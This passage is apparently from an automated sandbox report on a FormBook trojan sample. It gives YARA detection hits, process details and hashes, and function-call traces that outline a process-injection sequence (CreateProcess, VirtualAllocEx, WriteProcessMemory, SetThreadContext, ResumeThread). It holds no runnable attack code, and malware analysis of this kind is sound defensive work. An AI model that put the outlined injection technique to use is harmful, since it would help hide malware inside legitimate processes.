                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3552629363.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3552629363.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:moderate
                                          Has exited:false

                                          Target ID:11
                                          Start time:15:43:27
                                          Start date:07/09/2024
                                          Path:C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe"
                                          Imagebase:0xad0000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3555734438.0000000004F50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3555734438.0000000004F50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          Target ID:12
                                          Start time:15:43:39
                                          Start date:07/09/2024
                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                          Imagebase:0x7ff6bf500000
                                          File size:676'768 bytes
                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                            Execution Graph

                                            Execution Coverage:10%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:3.8%
                                            Total number of Nodes:344
                                            Total number of Limit Nodes:10

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1841035781.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5410000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Pp^q$d
                                            • API String ID: 0-2169010058
                                            • Opcode ID: 78bc2ed3cc3d9452b935f3bcfa86788320c94fd706942aa6f4145162555264a4
                                            • Instruction ID: 0b7ae39e690d22b3e1bd0366d704a65521ecc0e089be708275baea76a1263622
                                            • Opcode Fuzzy Hash: 78bc2ed3cc3d9452b935f3bcfa86788320c94fd706942aa6f4145162555264a4
                                            • Instruction Fuzzy Hash: 81E2B434A102199FCB64DF69C894AD9B7B2FF89300F5181EAD809AB351DB31AEC5CF44

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1841035781.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5410000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Pp^q$d
                                            • API String ID: 0-2169010058
                                            • Opcode ID: 86d569eaa48f5f7b50abb2b21537708d0f4e40238df33ee9185be0e9783f7055
                                            • Instruction ID: ff69be775543d7a810256f559d06337067824c028fe23e8a66c1accfbf27dcfb
                                            • Opcode Fuzzy Hash: 86d569eaa48f5f7b50abb2b21537708d0f4e40238df33ee9185be0e9783f7055
                                            • Instruction Fuzzy Hash: BEC2A434A102198FDB64DF69C894AD9B7B2FF89301F5185EAD4096B360EB31AEC5CF40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea69957f29326103308f7c3f0789665ddb4adaa7aa0541dd33a48a162e7e3f0d
                                            • Instruction ID: 386c7d96a4d63b5296c723e2bb1078c5380b24d9db5bbc95f9f6f4ca61f27a35
                                            • Opcode Fuzzy Hash: ea69957f29326103308f7c3f0789665ddb4adaa7aa0541dd33a48a162e7e3f0d
                                            • Instruction Fuzzy Hash: 15E01AB481D384CBC740DB249C545B8BFB96F4B311F0422E5C82AEB253DA209844CB00
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8c482d281e6c7a0ef3fb09aaf439cb2af9b93294b235932dff2a48aba3902fe9
                                            • Instruction ID: 83b404f87b56aa4e6ce84ea330e1079fbe145b93ff3d8b65718fb51d3bf3e3aa
                                            • Opcode Fuzzy Hash: 8c482d281e6c7a0ef3fb09aaf439cb2af9b93294b235932dff2a48aba3902fe9
                                            • Instruction Fuzzy Hash: 3BD09EB4C1D254CBCB94DF54DC845B8BBBCAB4F711F1021A5D42AA7312D6709885CA04

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A7B98E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID: R
                                            • API String ID: 983334009-1466425173
                                            • Opcode ID: 068dac1f92ca06bfa3ee86c241e431bfe7bd796a61ffb7a95daef45c72eba7c0
                                            • Instruction ID: 0f10f07478d28c6dbcce37062ce2c3522d89193f6145b7dea5bdc4086e6b2b46
                                            • Opcode Fuzzy Hash: 068dac1f92ca06bfa3ee86c241e431bfe7bd796a61ffb7a95daef45c72eba7c0
                                            • Instruction Fuzzy Hash: 90216DB1D003098FDB10DFAAC8457EEBBF4EF88314F148429D469A7241C7789945CFA5

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A7B98E
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A7BA56
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: AllocContextThreadVirtualWow64
                                            • String ID:
                                            • API String ID: 2727713192-0
                                            • Opcode ID: 693e5a28a8600de88639e72002437a356af780934635f0d6ae5db2abee70adf1
                                            • Instruction ID: b39c3ae42a4c2524c1aa69b1c2eeb9e8ea04a847a9fe903dd6499ef47b031c94
                                            • Opcode Fuzzy Hash: 693e5a28a8600de88639e72002437a356af780934635f0d6ae5db2abee70adf1
                                            • Instruction Fuzzy Hash: 10318CB28003498FCB10DFA9C8057EEBFF5EF88324F14841AD569A7250C7399955CFA1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A7BF66
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 1ddabfd6e126ce17cdbf42b6536ea331e2cb85039dcf1f88b55c622dcaf07890
                                            • Instruction ID: 1e8e5fd769f7a0c75eefeaccb84c3ce23cfb2e16920024fb70a04b1f8f39ba1f
                                            • Opcode Fuzzy Hash: 1ddabfd6e126ce17cdbf42b6536ea331e2cb85039dcf1f88b55c622dcaf07890
                                            • Instruction Fuzzy Hash: 0CA13AF1D0021ADFDB14CF69CC41BEEBBB6AF48314F1481A9D859A7240DB749985CFA2

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A7BF66
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 35ffa6a078d5afaaba3541f34bd5f2785679358bf8ba9ff21c3420712349ca96
                                            • Instruction ID: 0d5e07191824edc89ed7f1c48b22770d0daf2e9f30651d663a756f27039a4651
                                            • Opcode Fuzzy Hash: 35ffa6a078d5afaaba3541f34bd5f2785679358bf8ba9ff21c3420712349ca96
                                            • Instruction Fuzzy Hash: BA913BF1D0021ADFDB14DF69CC41BAEBBB6BF48314F1481A9D819A7240DB749985CFA2

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 013FB086
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835829616.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13f0000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 89c5dd684cb95271bf5f232b682e3efbc715c414a6300bf9da8137872ec43bc7
                                            • Instruction ID: a0bf4ddef46150862e4db7293f682af4344bb675f142afb1acdfec63b42a1446
                                            • Opcode Fuzzy Hash: 89c5dd684cb95271bf5f232b682e3efbc715c414a6300bf9da8137872ec43bc7
                                            • Instruction Fuzzy Hash: 1A7136B0A00B058FD724DF69D48475ABBF1FF88308F10892DE58ADBA50DB75E949CB91
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 05414381
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1841035781.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5410000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: e15acf8eed6e4e61b59c674d0d461e5beb7c32e37f1401f5da5aaa060d64c19b
                                            • Instruction ID: 6f9de0c2a52fc1f5763c42c36e8554ccdc3a4ea09a919b6d67798c13ed847442
                                            • Opcode Fuzzy Hash: e15acf8eed6e4e61b59c674d0d461e5beb7c32e37f1401f5da5aaa060d64c19b
                                            • Instruction Fuzzy Hash: 4E413BB4A003098FCB14DF99C488AAABBF5FF88314F24C45AD519AB361D774A841CBA4
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 013F59C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835829616.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13f0000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 891820ab5b16b196a8db60d1fb19ea0129fffe8f704f537fc3be83542eba8529
                                            • Instruction ID: ab54ad5153d0e4ab770a8ac507814a3ce4657d040ae7cc187e95ef2c130d2410
                                            • Opcode Fuzzy Hash: 891820ab5b16b196a8db60d1fb19ea0129fffe8f704f537fc3be83542eba8529
                                            • Instruction Fuzzy Hash: 5341DFB0C0071DCBDF28DFA9C884B9EBBB5BF49304F20806AD509AB251DB756949CF90
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 013F59C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835829616.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13f0000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 5f7da64ba10891fb0b55f40dc8a4bd976be1d2b43a67e7207ed6c1c939163bd7
                                            • Instruction ID: 53dd5441bab8366eb7eec08b8d486adffbfde8bc46e27db5dd9ea5e4bd46fd70
                                            • Opcode Fuzzy Hash: 5f7da64ba10891fb0b55f40dc8a4bd976be1d2b43a67e7207ed6c1c939163bd7
                                            • Instruction Fuzzy Hash: DE41E2B0C00719CEDF29CFA9C885BDEBBB5BF49304F20806AD509AB255DB756949CF90
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A7BB38
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 27887fcf947e6bc1e1a82edcd48f36fcecefe265678a1d77a7428f9d39ff2d32
                                            • Instruction ID: cac500693961b0baea50e82063c8e7ed2fb75b95b9db197352b07fc7e11cedb1
                                            • Opcode Fuzzy Hash: 27887fcf947e6bc1e1a82edcd48f36fcecefe265678a1d77a7428f9d39ff2d32
                                            • Instruction Fuzzy Hash: DA2169B19003499FCB10CFA9C885BEEBFF5FF88310F10842AE959A7241C7789955CBA4
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A7BB38
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: dff6dfc7fc9a9ea020ce2e150a060a9541d2a3839827452f5079d41ca87f1573
                                            • Instruction ID: ca97b819423bb7cc51d53f3fbc11092c2cff68c0c731ac8d7253129f5904255d
                                            • Opcode Fuzzy Hash: dff6dfc7fc9a9ea020ce2e150a060a9541d2a3839827452f5079d41ca87f1573
                                            • Instruction Fuzzy Hash: 2A214AB19003099FCB10DFA9C885BDEBBF5FF88310F10842AE919A7340C7789955CBA4
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013FD2C6,?,?,?,?,?), ref: 013FD387
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835829616.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13f0000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: cd2d24a9146fd1de14f603017b382b05ca5e3d28738d7613b824683ce9e43daf
                                            • Instruction ID: a14c55df5a4a458e119bcf576635760b5e47d47903cf347b2eab3a24a7ccb03b
                                            • Opcode Fuzzy Hash: cd2d24a9146fd1de14f603017b382b05ca5e3d28738d7613b824683ce9e43daf
                                            • Instruction Fuzzy Hash: B121E6B59003089FDB10CF9AD984ADEBFF5EB48314F14841AEA58A7350D374A954CFA5
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A7BC18
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 296b96ae6c2fa3c210aa0a7a622f63f28c721f071c9e53fc51071fa2cf21aef1
                                            • Instruction ID: 008963673a23fcdd23978446ed81d6c83a8695f85198a15ea06b5009e3c2d4a9
                                            • Opcode Fuzzy Hash: 296b96ae6c2fa3c210aa0a7a622f63f28c721f071c9e53fc51071fa2cf21aef1
                                            • Instruction Fuzzy Hash: DF2136B19003499FCB10CFA9C885AEEFBF1FF88310F50842EE518A7240C7389955CBA4
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A7BC18
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: cb1f39a8c8ae81b6fbfa33052c4e29074584023dd88e88f7b45bd78b3d74fa96
                                            • Instruction ID: 5a26ffb1cfcbe6eac2c8ef7e9fa0e13bf2dede43a1af966e86de3b935d09f9e4
                                            • Opcode Fuzzy Hash: cb1f39a8c8ae81b6fbfa33052c4e29074584023dd88e88f7b45bd78b3d74fa96
                                            • Instruction Fuzzy Hash: 042139B1D003499FCB10DFAAC845AEEFBF5FF88310F50842AE519A7240C7389955DBA4
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A7B98E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 1c415146ffc6740f0cf9471a8249d61fa27cb0aa8a3581ad8b57a6db4244a128
                                            • Instruction ID: 0e1ddfc29a5506013a220f53c6e3e83b3e0d72b11d42b9f754a43c1f4e61b299
                                            • Opcode Fuzzy Hash: 1c415146ffc6740f0cf9471a8249d61fa27cb0aa8a3581ad8b57a6db4244a128
                                            • Instruction Fuzzy Hash: 29211AB19003098FDB10DFAAC4857EEBBF4EF88314F148429D569A7241D7789945CFA5
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013FD2C6,?,?,?,?,?), ref: 013FD387
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835829616.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13f0000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 198dea39cef55b31314657cbd2dd1127b2c1c332b3eb289d4971cae7871d5dc7
                                            • Instruction ID: 40a050fd01f9642f39474c6240a746d5283b9e7621ee9d071b54de5d836e8c03
                                            • Opcode Fuzzy Hash: 198dea39cef55b31314657cbd2dd1127b2c1c332b3eb289d4971cae7871d5dc7
                                            • Instruction Fuzzy Hash: 4C2112B5D003089FDB10CFA9D584ADEBBF5FB48310F10841AE918A3310C338A954CFA0
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013FB101,00000800,00000000,00000000), ref: 013FB312
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835829616.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13f0000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 80dd5676ee08ea89628d6f8f62f5e5c6e223868e6b111a0483ce4b787a33e9e8
                                            • Instruction ID: 463f9bd653843dbf7c262cce8c243ff70df85c63c282f97cd4c54da32dd172fb
                                            • Opcode Fuzzy Hash: 80dd5676ee08ea89628d6f8f62f5e5c6e223868e6b111a0483ce4b787a33e9e8
                                            • Instruction Fuzzy Hash: 6111D3B69003499FDB14DF9AC448A9EFBF8EB88314F10842ED959A7240C375A945CFA5
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013FB101,00000800,00000000,00000000), ref: 013FB312
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835829616.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13f0000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: c9b05163f5aa5811aee73e7bc0428c173986916ac9c228057421c5178158854d
                                            • Instruction ID: 910bd11b35756b8f5a81b9251bb5d5825a29fbf239860b44be53f352772fc052
                                            • Opcode Fuzzy Hash: c9b05163f5aa5811aee73e7bc0428c173986916ac9c228057421c5178158854d
                                            • Instruction Fuzzy Hash: 201100B6D003489FDB10CF9AD844A9EFFF8EB88310F10842EE959A7200C775A545CFA4
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 031d1c5e5ae2d9c39974cc7126cd54b3f18ebd9ae13f6d594c64dfaa7c8e4827
                                            • Instruction ID: 65361f388190daeeebc8c2055c12c5528882c07f3e5696b9a3b6f687e9198570
                                            • Opcode Fuzzy Hash: 031d1c5e5ae2d9c39974cc7126cd54b3f18ebd9ae13f6d594c64dfaa7c8e4827
                                            • Instruction Fuzzy Hash: 321146B19003499FDB10DFAAC8457DEFFF5EF88324F24881AD459A7240CB38A945CBA5
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A7BA56
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: cfa50789a2b66fcdfc7333b22af13fde99b6930823ed993e6e59ba41b9c5b8e4
                                            • Instruction ID: 08039142926c6c98322d818407da9c3944c5c1591c7399ad50d29c8fe75e25ec
                                            • Opcode Fuzzy Hash: cfa50789a2b66fcdfc7333b22af13fde99b6930823ed993e6e59ba41b9c5b8e4
                                            • Instruction Fuzzy Hash: 181137B19003499FCB10DFAAC845ADFBFF5EF88320F108419E529A7250C775A954CFA4
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 013FB086
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835829616.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13f0000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: f5abf0784f0df29af2d7094b135fffdb1d59cb03418e7f8c01504d18692dda44
                                            • Instruction ID: 844a2cd89c164aaf95ff785c9a65bb6b0689724af1fca4a1523e80fca79e26ac
                                            • Opcode Fuzzy Hash: f5abf0784f0df29af2d7094b135fffdb1d59cb03418e7f8c01504d18692dda44
                                            • Instruction Fuzzy Hash: B21132B5C003498FDB20CF9AC844ADEFFF4AB88314F10841ED928A7210C375A549CFA0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 58d93f9a5b4de37e42e4b6d55e95ac306a0c758ae819c62db0dba0f1fd641976
                                            • Instruction ID: f64a3191ecab6a4b6cb9ac2f3eef51a4b59796864cc8b1f60c99d63d5efd32a9
                                            • Opcode Fuzzy Hash: 58d93f9a5b4de37e42e4b6d55e95ac306a0c758ae819c62db0dba0f1fd641976
                                            • Instruction Fuzzy Hash: D81128B1D003498BDB10DFAAC8457DEFBF5EB88324F24841AD519A7240CB75A944CBA4
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 013FB086
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1835829616.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13f0000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 6f3d033fd94fcbe7298864c26ca0cdb4275f4d95229c433cb2587a0b061ed1d5
                                            • Instruction ID: b785ba08ef20c2c06d9b9b0aa58185710bd4025cf3a590ee68bff741673e06a8
                                            • Opcode Fuzzy Hash: 6f3d033fd94fcbe7298864c26ca0cdb4275f4d95229c433cb2587a0b061ed1d5
                                            • Instruction Fuzzy Hash: 7911DFB5C003498FDB24DF9AC444ADEFBF5AB88224F10841ED969A7610C379A549CFA5
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A7F4E5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 571a05a9e2bd53aaed6be25204ac426c55e75468597efdbe2b01bfc23ae29e38
                                            • Instruction ID: bde0a142ee7d0f8da05c5388c8665ab0ef16a6c4f840b592b2d36952f4b6f694
                                            • Opcode Fuzzy Hash: 571a05a9e2bd53aaed6be25204ac426c55e75468597efdbe2b01bfc23ae29e38
                                            • Instruction Fuzzy Hash: 361106B58003499FDB10DF99C849BDEBBF8FB48320F108419E969A7200C375A954CFA5
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A7F4E5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: edafb70be0810eaa0d6becfd6032b7f3a26b49f6e8c2f577f8083ed539417c0b
                                            • Instruction ID: 9d6c8ad31e492681a36bccd5500bb2e0f41c5da8d5e0f0764774d89d7929d47c
                                            • Opcode Fuzzy Hash: edafb70be0810eaa0d6becfd6032b7f3a26b49f6e8c2f577f8083ed539417c0b
                                            • Instruction Fuzzy Hash: 3B1106B58003499FDB10DF9AC849BDEBFF8EB48320F108419E968A7200C375A554CFA5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: }^`
                                            • API String ID: 0-519891959
                                            • Opcode ID: 263a018856bd53f3a24925714e62109ef072a133f53d107613e8e2df867c7a6b
                                            • Instruction ID: 4f684b7333fd9538eed26528325e54f679cafe653a21d01fcbe7e21f771b9190
